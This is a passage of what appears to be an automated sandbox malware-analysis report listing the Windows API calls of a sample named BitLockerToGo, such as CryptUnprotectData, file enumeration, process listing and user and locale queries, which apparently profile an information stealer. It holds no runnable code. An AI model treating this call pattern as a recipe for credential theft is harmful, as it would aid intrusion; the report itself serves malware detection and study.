                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3334442632-0
                                                                                                                                                      • Opcode ID: a22756e38f8447440ae6e18d1abdd913419fd3014d7a040a8bb54b6cf7fe5213
                                                                                                                                                      • Instruction ID: 379e888e3abfc8d4d55e041736d016d0995b0944775f6a94576bbe9a2a547398
                                                                                                                                                      • Opcode Fuzzy Hash: a22756e38f8447440ae6e18d1abdd913419fd3014d7a040a8bb54b6cf7fe5213
                                                                                                                                                      • Instruction Fuzzy Hash: 359131729002159BDB16FFB4EC5DAFD737EAB84300F408668AD0AA6140EE749B59CFD1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,027705AF), ref: 02767BE1
                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02767BF9
                                                                                                                                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 02767C0D
                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02767C62
                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 02767D22
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                      • String ID: /
                                                                                                                                                      • API String ID: 3090951853-4001269591
                                                                                                                                                      • Opcode ID: 95856565e9eeda9bdca93afa41b3fc4c4bc1ce91bc7bd2e133c28a1d705cadfd
                                                                                                                                                      • Instruction ID: 8397dba0595415a07148811cc266c00a8474a1c005ee73d43cc3315f71f8f65a
                                                                                                                                                      • Opcode Fuzzy Hash: 95856565e9eeda9bdca93afa41b3fc4c4bc1ce91bc7bd2e133c28a1d705cadfd
                                                                                                                                                      • Instruction Fuzzy Hash: CD412A71941218ABDB25DB94DC9DBFEB7B9FB44704F204199E90A72180DB742F85CFA0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,02770D73), ref: 0275E4A2
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,027714F8), ref: 0275E4F2
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,027714FC), ref: 0275E508
                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0275EBDF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                      • String ID: \*.*
                                                                                                                                                      • API String ID: 433455689-1173974218
                                                                                                                                                      • Opcode ID: 4c62ccb4bddac64c8d2366ea1d01754e41f2a0f20154d80a2649b5b2c8744059
                                                                                                                                                      • Instruction ID: 8710dc0a6f7de58ef55010e58a6abfcff679513709f8f85dba7024e9d84e4812
                                                                                                                                                      • Opcode Fuzzy Hash: 4c62ccb4bddac64c8d2366ea1d01754e41f2a0f20154d80a2649b5b2c8744059
                                                                                                                                                      • Instruction Fuzzy Hash: 68121E719102199ADB1AFB60DDADEFE737AAF54300F4045A9990AB6090EF306F49CFD1
                                                                                                                                                      APIs
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0276961E
                                                                                                                                                      • Process32First.KERNEL32(02770ACA,00000128), ref: 02769632
                                                                                                                                                      • Process32Next.KERNEL32(02770ACA,00000128), ref: 02769647
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0276965C
                                                                                                                                                      • CloseHandle.KERNEL32(02770ACA), ref: 0276967A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                      • Opcode ID: aca1db47d66106c99d15f742d82d26fc5e8f7c27764dacb963f1db052cff4dee
                                                                                                                                                      • Instruction ID: f976c2a2e472bed230f92e29051807e440a32efd3dc628f72c36103c3a5e03d0
                                                                                                                                                      • Opcode Fuzzy Hash: aca1db47d66106c99d15f742d82d26fc5e8f7c27764dacb963f1db052cff4dee
                                                                                                                                                      • Instruction Fuzzy Hash: B3011E75E44308EBCB14DFA5C958BFDB7F8EB48310F004588AA06A7240D7759B50CF90
                                                                                                                                                      APIs
                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02759B84
                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 02759BA3
                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 02759BC6
                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 02759BD3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3243516280-0
                                                                                                                                                      • Opcode ID: 225704a8300a5752ec93555bf157b30c6d95208c29e64a894d70c107cdd6bbdb
                                                                                                                                                      • Instruction ID: 3ca6660c2185596c78c405b7968e840888cc4d8b67f900da97cd7c2389c2b50f
                                                                                                                                                      • Opcode Fuzzy Hash: 225704a8300a5752ec93555bf157b30c6d95208c29e64a894d70c107cdd6bbdb
                                                                                                                                                      • Instruction Fuzzy Hash: 5811B7B8A00209EFDB04DF98D989AAEB7B5FF88304F104598ED15A7350D774AA50CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,029E5C38,00000000,?,02770E10,00000000,?,00000000,00000000), ref: 02767A63
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02767A6A
                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,029E5C38,00000000,?,02770E10,00000000,?,00000000,00000000,?), ref: 02767A7D
                                                                                                                                                      • wsprintfA.USER32 ref: 02767AB7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3317088062-0
                                                                                                                                                      • Opcode ID: 56710708da5a4c1a8fc1c06a47eca50a704ebffc417f9cd5e9735f51ec8fab93
                                                                                                                                                      • Instruction ID: 007ea9e0113375907c3b48a7c5fa721572ad72b13251bfd958fb853b5f458d21
                                                                                                                                                      • Opcode Fuzzy Hash: 56710708da5a4c1a8fc1c06a47eca50a704ebffc417f9cd5e9735f51ec8fab93
                                                                                                                                                      • Instruction Fuzzy Hash: E0118EB1E45218EBEB208B59DC49FB9BB78FB04721F0047DAE90AA3280C7741A40CF90
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,027511B7), ref: 02767880
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02767887
                                                                                                                                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0276789F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1296208442-0
                                                                                                                                                      • Opcode ID: c1ca157823547e24b5d5a765682a62e3aab92cc236dc4f18ca5cf9608aeae3f4
                                                                                                                                                      • Instruction ID: d477dd20b0c9f61868f0cb0d705d41816be074eb22865638578101699ef2ba5f
                                                                                                                                                      • Opcode Fuzzy Hash: c1ca157823547e24b5d5a765682a62e3aab92cc236dc4f18ca5cf9608aeae3f4
                                                                                                                                                      • Instruction Fuzzy Hash: 29F04FB1D44209ABD714DF99D94ABBEFBB8EB04721F10065AFA05A2680C7791904CBE1
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2452939696-0
                                                                                                                                                      • Opcode ID: d6e2f34e73e928ec7d263461424b0891a8b751148b890f7cb5165f8f2c77a1de
                                                                                                                                                      • Instruction ID: 1901fc2398b1fd3a29be79bbd9da6733951370a3d058c4c5d27a7ddcab3eeabf
                                                                                                                                                      • Opcode Fuzzy Hash: d6e2f34e73e928ec7d263461424b0891a8b751148b890f7cb5165f8f2c77a1de
                                                                                                                                                      • Instruction Fuzzy Hash: 49F062B1E44208EBDB14CF89DC45FAAFBBCF744624F000669F915A2244D77569148BD4

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DEA08), ref: 02769C2D
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DE8A8), ref: 02769C45
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAC28), ref: 02769C5E
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DABC8), ref: 02769C76
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAC10), ref: 02769C8E
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAD18), ref: 02769CA7
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E0270), ref: 02769CBF
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAD60), ref: 02769CD7
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAB20), ref: 02769CF0
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAD78), ref: 02769D08
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAD90), ref: 02769D20
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DEA48), ref: 02769D39
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DE908), ref: 02769D51
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DEC48), ref: 02769D69
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DEC68), ref: 02769D82
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAB38), ref: 02769D9A
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DABE0), ref: 02769DB2
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E0298), ref: 02769DCB
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DEA28), ref: 02769DE3
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DABF8), ref: 02769DFB
